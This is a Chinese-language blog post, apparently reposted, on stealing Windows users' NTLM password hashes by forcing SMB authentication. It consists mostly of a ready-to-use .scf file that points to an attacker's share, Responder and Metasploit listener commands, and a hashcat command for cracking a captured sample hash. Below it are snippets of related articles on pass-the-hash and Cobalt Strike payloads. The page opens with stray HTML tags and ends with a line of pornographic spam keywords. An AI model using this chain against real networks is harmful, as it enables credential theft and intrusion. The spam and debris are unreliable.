<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    利用強制smb身份驗證獲取用戶哈希

    VSole2021-11-07 05:47:54

    前言

    攻擊者可通過向共享目錄投遞連接外部服務器的資源文件,用戶請求過程中嘗試身份驗證,會默認使用SMB協議將用戶哈希發送到服務器,這樣攻擊者就會獲取對方用戶賬戶哈希。

    創建共享目錄scf文件

    [Shell]
    Command=2
    IconFile=\\X.X.X.X\share\1.ico
    [Taskbar]
    Command=ToggleDesktop
    

    重命名后綴為.scf,保存在共享目錄

    使用responder接收哈希

    使用responder開啟監聽

    git clone https://github.com/lgandx/Responder.git
    python Responder.py -wrf --lm -v -I eth0
    

    使用任一用戶訪問剛才建立好的共享目錄,只要進入到保存有.scf這一文件的層級就會觸發smb身份驗證,responder會監聽到NTLMv2哈希

    使用msf模塊接收哈希

    use auxiliary/server/capture/smb
    run
    

    使用hashcat配合字典來破解

    hashcat -m 5600 Administrator::NEXT:b36ff0a87f24a5b2:59D4E07C55717C42B167E2FF178C0B83:01010000000000005D83AE7CFE67D701B33B25F625134A1E00000000020000000000000000000000 /root/pass.txt --force
    

    smb哈希
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    哈希傳遞利用了NTLM認證的缺陷,使用用戶的密碼哈希值來進行NTLM認證。推薦使用以下命令,盡量不要從內存中提取,因為內存中存放的可能是管理員修改密碼前的哈希值,導致哈希傳遞不成功。
    Pass The Hash 即哈希傳遞攻擊,簡稱 PTH
    分析Cobalt Strike Payload
    2021-12-11 06:49:22
    原始Payload Cobalt Strike 的Payload基于 Meterpreter shellcode,例如 API 哈希(x86和x64版本)或http/https Payload中使用的url checksum8 算法等等。 x86 默認的 32 位原始負載的入口點以典型指令開始,CLD (0xFC),然后是CALL指令,并PUSHA (0x60)作為 API 哈希算法的第一條
    攻擊者可通過向共享目錄投遞連接外部服務器的資源文件,用戶請求過程中嘗試身份驗證,會默認使用SMB協議將用戶哈希發送到服務器,這樣攻擊者就會獲取對方用戶賬戶哈希
    哈希傳遞對于大多數企業或組織來說仍然是一個非常棘手的問題,這種攻擊手法經常被滲透測試人員和攻擊者們使用。當談及檢測哈希傳遞攻擊時,我首先開始研究的是先看看是否已經有其他人公布了一些通過網絡來進行檢測的可靠方法。我拜讀了一些優秀的文章,但我沒有發現可靠的方法,或者是這些方法產生了大量的誤報。 我不會在本文深入剖析哈希傳遞的歷史和工作原理,但如果你有興趣,你可以閱讀SANS發布的這篇優秀的文章——哈希
    微軟宣布,為了提高Windows的安全性,此后在Windows 11 Insider Preview Build 25381企業版中,默認所有連接都需要SMB簽名。SMB簽名可以確保每條消息都包含使用會話密鑰和密碼套件生成的簽名。微軟官網上說,所有版本的Windows和Windows Server都支持SMB簽名,但第三方可能會對它禁用或不支持。不支持簽名的SMB設備允許惡意方進行攔截和中繼攻擊。
    一名研究人員在 Windows 操作系統中發現了一個漏洞,跟蹤為 PetitPotam,可利用該漏洞強制遠程 Windows 機器共享其密碼哈希
    俄羅斯黑客利用 Outlook 漏洞竊取 NTLM 哈希。微軟解釋稱,攻擊者可以通過發送一個精心構造的消息來利用該漏洞來獲取 NTLM 哈希值。到遠程 SMB 服務器的連接發送用戶 NTLM 協商消息,然后攻擊者就可以中繼該消息來實現對支持 NTLM 認證的其他系統的認證。但郵件發送者并不應該能夠配置接收者系統的消息提醒音樂。
    0x01 前言之前在打一個域環境的時候出現了域內主機不出網的情況,當時用的是cs的socks代理將不出網主機的流量代理到了邊緣主機上。當時沒有考慮太多,下來之后想到搭一個環境復現一下當時的情況,看有沒有更簡便的方法能夠打下不出網的主機
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类